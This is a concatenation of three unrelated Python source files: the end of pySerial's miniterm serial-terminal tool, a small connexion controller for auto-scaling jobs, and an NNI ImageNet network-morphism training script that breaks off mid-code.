0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
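# Note (added for clarity; not in the original file): filters are chosen on the
# command line with -f/--filter NAME, e.g.
#   python miniterm.py /dev/ttyUSB0 115200 --filter printable
# (port name shown only as an example). The EOL transformation is applied first
# on transmit and last on receive; the selected filters follow in the listed
# order for tx and in reverse order for rx (see update_transformations below).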
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7':                          # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script
# e.g. to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
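# Hedged usage note (assuming this is pyserial's miniterm entry point; the
# module path is an assumption, not taken from this file): a typical invocation
# looks like
#   python -m serial.tools.miniterm /dev/ttyUSB0 115200 --eol LF
# and, per the filter handling above, `--filter help` prints the available
# text transformations and exits.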
|
default_controller.py
|
import connexion
import six
import threading
from server import util
from auto_scaling import *
from server.models.scaling_info import DQN_ScalingInfo
from server.models.scaling_info import Threshold_ScalingInfo
from server.models.scaling_info import AutoScaler
def get_all_scaling():
response = []
for process in scaler_list:
response.append(process.get_info())
return response
def get_scaling(name):
response = [ process.get_info() for process in scaler_list if process.scaling_name == name]
return response
def create_threshold_scaling(body):
if connexion.request.is_json:
body = Threshold_ScalingInfo.from_dict(connexion.request.get_json())
response = AutoScaler(body, "threshold")
scaler_list.append(response)
threading.Thread(target=threshold_scaling, args=(response,)).start()
return response.get_info()
def create_dqn_scaling(body):
if connexion.request.is_json:
body = DQN_ScalingInfo.from_dict(connexion.request.get_json())
response = AutoScaler(body, "dqn")
scaler_list.append(response)
threading.Thread(target=dqn_scaling, args=(response,)).start()
return response.get_info()
def delete_scaling(name):
index = -1
response = []
for process in scaler_list:
if process.scaling_name == name:
index = scaler_list.index(process)
break
if index > -1:
response = scaler_list[index].get_info()
scaler_list[index].set_active_flag(False)
scaler_list.remove(scaler_list[index])
return response
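# Behavior note (added for clarity): delete_scaling returns the removed
# scaler's info dict when a scaler named `name` exists, and an empty list
# otherwise. The active flag is cleared before removal, presumably so the
# background scaling thread started in the create_* handlers can observe the
# shutdown request (an assumption about auto_scaling's internals).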
|
imagenet_train.py
|
# Copyright (c) Microsoft Corporation
# Copyright (c) Peng Cheng Laboratory
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# -*-coding:utf-8-*-
import argparse
import logging
import os
import json
import time
import zmq
import random
import numpy as np
import multiprocessing
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping
from tensorflow.keras.optimizers import SGD
import nni
from nni.networkmorphism_tuner.graph import json_to_graph
import nni.hyperopt_tuner.hyperopt_tuner as TPEtuner
import utils
import imagenet_preprocessing
import dataset as ds
os.environ['TF_ENABLE_AUTO_MIXED_PRECISION'] = '1'
log_format = "%(asctime)s %(message)s"
logging.basicConfig(
filename="networkmorphism.log",
filemode="a",
level=logging.INFO,
format=log_format,
datefmt="%m/%d %I:%M:%S %p",
)
logger = logging.getLogger("Imagenet-network-morphism-tfkeras")
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
# imagenet2012
Ntrain = 1281167
Nvalidation = 50000
shuffle_buffer = 1024
examples_per_epoch = shuffle_buffer
tf.config.optimizer.set_jit(True)
def get_args():
""" get args from command line
"""
parser = argparse.ArgumentParser("imagenet")
parser.add_argument("--ip", type=str, default='127.0.0.1', help="ip address")
parser.add_argument("--train_data_dir", type=str, default=None, help="tain data directory")
parser.add_argument("--val_data_dir", type=str, default=None, help="val data directory")
parser.add_argument("--slave", type=int, default=2, help="trial concurrency")
parser.add_argument("--batch_size", type=int, default=448, help="batch size")
parser.add_argument("--warmup_1", type=int, default=15, help="epoch of first warm up round")
parser.add_argument("--warmup_2", type=int, default=30, help="epoch of second warm up round")
parser.add_argument("--warmup_3", type=int, default=45, help="epoch of third warm up round")
parser.add_argument("--epochs", type=int, default=60, help="epoch limit")
parser.add_argument("--initial_lr", type=float, default=1e-1, help="init learning rate")
parser.add_argument("--final_lr", type=float, default=0, help="final learning rate")
parser.add_argument("--maxTPEsearchNum", type=int, default=2, help="max TPE search number")
parser.add_argument("--smooth_factor", type=float, default=0.1, help="max TPE search number")
parser.add_argument("--num_parallel_calls", type=int, default=48, help="number of parallel call during data loading")
return parser.parse_args()
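# Hedged usage sketch (the paths below are placeholders, not from the original):
# besides being launched by NNI, the parser above also allows a direct run like
#   python imagenet_train.py --train_data_dir /path/to/train_tfrecords \
#       --val_data_dir /path/to/val_tfrecords --batch_size 448 --epochs 60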
def build_graph_from_json(ir_model_json):
"""build model from json representation
"""
try:
graph = json_to_graph(ir_model_json)
logging.debug(graph.operation_history)
model = graph.produce_tf_model()
return model
except Exception as E:
print("#########:" + str(E))
f = open('resnet50.json', 'r')
a = json.load(f)
RCV_CONFIG = json.dumps(a)
f.close()
graph = json_to_graph(RCV_CONFIG)
model = graph.produce_tf_model()
return model
def parse_rev_args(receive_msg, esargs):
""" parse reveive msgs to global variable
"""
global net
global bs_explore
global gpus
# Model
bs_explore = int(esargs['batch_size'])
mirrored_strategy = tf.distribute.MirroredStrategy()
with mirrored_strategy.scope():
net = build_graph_from_json(receive_msg)
optimizer = SGD(lr=args.initial_lr, momentum=0.9, decay=1e-4)
optimizer = tf.train.experimental.enable_mixed_precision_graph_rewrite(optimizer, loss_scale=256)
loss = tf.keras.losses.CategoricalCrossentropy(label_smoothing=args.smooth_factor)
denseList = []
for index, layer in enumerate(net.layers):
if isinstance(layer, tf.keras.layers.Dropout):
net.layers[index].rate = esargs['dropout_rate']
if isinstance(layer, tf.keras.layers.Dense):
denseList.append(index)
if len(denseList) == 0:
thresh = 175
elif len(denseList) == 1:
thresh = denseList[0] + 1
else:
thresh = 175
for index, layer in enumerate(net.layers):
if index > thresh:
if isinstance(layer, tf.keras.layers.Conv2D):
net.layers[index].kernel_size = (esargs['kernel_size'], esargs['kernel_size'])
# Compile the model
net.compile(
# loss="categorical_crossentropy", optimizer=optimizer, metrics=["accuracy"]
loss=loss, optimizer=optimizer, metrics=["accuracy"]
)
class SendMetrics(tf.keras.callbacks.Callback):
"""
Keras callback to send metrics to NNI framework
"""
def __init__(self, hp_path):
super(SendMetrics, self).__init__()
self.hp_path = hp_path
self.best_acc = 0
def on_epoch_end(self, epoch, logs=None):
"""
Run on end of each epoch
"""
if logs is None:
logs = dict()
logger.debug(logs)
with open(self.hp_path, 'r') as f:
hp = json.load(f)
hp['epoch'] = epoch + 1
if logs['val_accuracy'] > self.best_acc:
self.best_acc = logs['val_accuracy']
hp['single_acc'] = logs['val_accuracy']
hp['finish_date'] = time.strftime('%m/%d/%Y, %H:%M:%S', time.localtime(time.time()))
with open(self.hp_path, 'w') as f:
json.dump(hp, f)
def train_eval(esargs, RCV_CONFIG, seqid):
""" train and eval the model
"""
global net
global best_acc
global bs_explore
global gpus
global hp_path
best_acc = 0
parse_rev_args(RCV_CONFIG, esargs)
# train procedure
trial_id = nni.get_trial_id()
available_devices = os.environ["CUDA_VISIBLE_DEVICES"]
gpus = len(available_devices.split(","))
is_training = True
filenames = ds.get_filenames(args.train_data_dir)
dataset = tf.data.Dataset.from_tensor_slices(filenames)
dataset = dataset.flat_map(tf.data.TFRecordDataset)
ds_train = ds.process_record_dataset(
dataset=dataset,
is_training=is_training,
batch_size=bs_explore,
shuffle_buffer=shuffle_buffer,
parse_record_fn=ds.parse_record,
num_epochs=args.epochs,
npc=args.num_parallel_calls,
num_gpus=gpus,
examples_per_epoch=examples_per_epoch if is_training else None,
dtype=tf.float32
)
is_training = False
filenames = ds.get_filenames(args.val_data_dir)
dataset = tf.data.Dataset.from_tensor_slices(filenames)
dataset = dataset.flat_map(tf.data.TFRecordDataset)
ds_val = ds.process_record_dataset(
dataset=dataset,
is_training=is_training,
batch_size=bs_explore,
shuffle_buffer=shuffle_buffer,
parse_record_fn=ds.parse_record,
num_epochs=args.epochs,
npc=args.num_parallel_calls,
num_gpus=gpus,
examples_per_epoch=None,
dtype=tf.float32
)
# run epochs and patience
loopnum = seqid // args.slave
patience = min(int(6 + (2 * loopnum)), 20)
if loopnum == 0:
run_epochs = int(args.warmup_1)
elif loopnum == 1:
run_epochs = int(args.warmup_2)
elif loopnum == 2:
run_epochs = int(args.warmup_3)
else:
run_epochs = int(args.epochs)
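    # Worked example (added): with args.slave=2 and sequence id 5,
    # loopnum = 5 // 2 = 2, so patience = min(6 + 2*2, 20) = 10 and
    # run_epochs = args.warmup_3 (45 by default).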
# if loopnum < 4:
# patience = int(8 + (2 * loopnum))
# run_epochs = int(10 + (20 * loopnum))
# else:
# patience = 16
# run_epochs = args.epochs
# lr strategy
def scheduler2(epoch):
lr_max = args.initial_lr
total_epochs = args.epochs
lr_each_epoch = lr_max - lr_max * epoch / total_epochs
return lr_each_epoch
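    # Worked example (added): with initial_lr=0.1 and epochs=60, scheduler2
    # gives lr = 0.1 - 0.1 * 30 / 60 = 0.05 at epoch 30, decaying linearly
    # toward 0 over the run.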
callback = tf.keras.callbacks.LearningRateScheduler(scheduler2)
# save weights
checkpoint_dir = os.environ["HOME"] + "/nni/experiments/" + str(nni.get_experiment_id()) + "/checkpoint/" + str(
nni.get_trial_id())
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
checkpoint_filepath = checkpoint_dir + "/weights." + "epoch." + str(run_epochs) + ".hdf5"
model_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
filepath=checkpoint_filepath,
monitor='val_accuracy',
mode='max',
save_best_only=True,
save_freq='epoch',
save_weights_only=True,
)
history = net.fit(
ds_train,
epochs=run_epochs,
steps_per_epoch=Ntrain // bs_explore // gpus,
validation_data=ds_val,
validation_steps=Nvalidation // bs_explore // gpus,
verbose=1,
shuffle=False,
callbacks=[SendMetrics(hp_path),
callback,
EarlyStopping(min_delta=0.001, patience=patience),
model_checkpoint_callback
])
# trial report final acc to tuner
acc = 0
acc_list = history.history['val_accuracy']
for acc_n in acc_list:
if float(acc_n) > acc:
acc = float(acc_n)
try:
# predict acc
if run_epochs >= 10 and run_epochs < 80:
epoch_x = range(1, len(acc_list) + 1)
pacc = utils.predict_acc(trial_id, epoch_x, acc_list, 90, True)
best_acc = float(pacc)
except Exception as E:
print("Predict failed.")
if acc > best_acc:
best_acc = acc
logger.debug("Final result is: %.3f", acc)
return best_acc, history.epoch[-1]
if __name__ == "__main__":
example_start_time = time.time()
net = None
args = get_args()
try:
experiment_path = os.environ["HOME"] + "/mountdir/nni/experiments/" + str(nni.get_experiment_id())
lock = multiprocessing.Lock()
context = zmq.Context()
socket = context.socket(zmq.REQ)
tmpstr = 'tcp://' + args.ip + ':800081'
socket.connect(tmpstr)
os.makedirs(experiment_path + "/trials/" + str(nni.get_trial_id()))
get_next_parameter_start = time.time()
nni.get_next_parameter(socket)
get_next_parameter_end = time.time()
while True:
lock.acquire()
with open(experiment_path + "/graph.txt", "a+") as f:
f.seek(0)
lines = f.readlines()
lock.release()
if lines:
break
if len(lines) > args.slave:
x = random.randint(1, args.slave)
json_and_id_str = lines[-x].replace("\n", "")
else:
json_and_id_str = lines[-1].replace("\n", "")
with open(experiment_path + "/trials/" + str(nni.get_trial_id()) + "/output.log", "a+") as f:
f.write("sequence_id=" + str(nni.get_sequence_id()) + "\n")
json_and_id = dict((l.split('=') for l in json_and_id_str.split('+')))
if str(json_and_id['history']) == "True":
